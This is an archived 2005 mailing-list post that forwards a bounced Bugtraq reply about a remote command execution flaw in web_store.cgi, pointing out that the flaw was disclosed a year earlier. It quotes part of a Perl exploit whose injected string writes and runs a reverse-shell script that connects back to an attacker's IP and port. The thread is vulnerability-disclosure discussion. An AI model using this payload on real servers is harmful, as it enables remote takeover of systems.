[VIM] Returned post for bugtraq@securityfocus.com (web_store.cgi)
security curmudgeon
jericho at attrition.org
Mon Jun 27 05:09:27 EDT 2005
---------- Forwarded message ----------
From: bugtraq-help at securityfocus.com
To: jericho at attrition.org
Date: 27 Jun 2005 01:12:05 -0000
Subject: Returned post for bugtraq at securityfocus.com
Hi! This is the ezmlm program. I'm managing the
bugtraq at securityfocus.com mailing list.
I'm working for my owner, who can be reached
at bugtraq-owner at securityfocus.com.
I'm sorry, the list moderators for the bugtraq list
have failed to act on your post. Thus, I'm returning it to you.
If you feel that this is in error, please repost the message
or contact a list moderator directly.
--- Enclosed, please find the message you sent.
From: security curmudgeon <jericho at attrition.org>
To: bugtraq at securityfocus.com
Date: Wed, 22 Jun 2005 04:47:00 -0400 (EDT)
Subject: Re: Remote Exploit for Web_store.cgi
On Mon, 13 Jun 2005 ActionSpider at securityfocus.com wrote:
: #!/usr/bin/perl -w
: #
:
#********************************************************************************************
: # Remote Command Execution Vulnerability In Web_store.cgi
*
: $string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use
Socket;$execute= 'echo "`uname -a`";echo
"`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target)
|| die("Error: $!\n");$paddr=sockaddr_in($port,
$iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET,
PF_INET, SOCK_STREAM, $proto) || die("Error:
$!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN,
">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR,
">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip
$reverse|";
This was disclosed on 2004-07-17 by Zero_X www.lobnan.de Team
(zero-x at linuxmail.org).
http://archives.neohapsis.com/archives/bugtraq/2004-07/0197.html
More information about the VIM
mailing list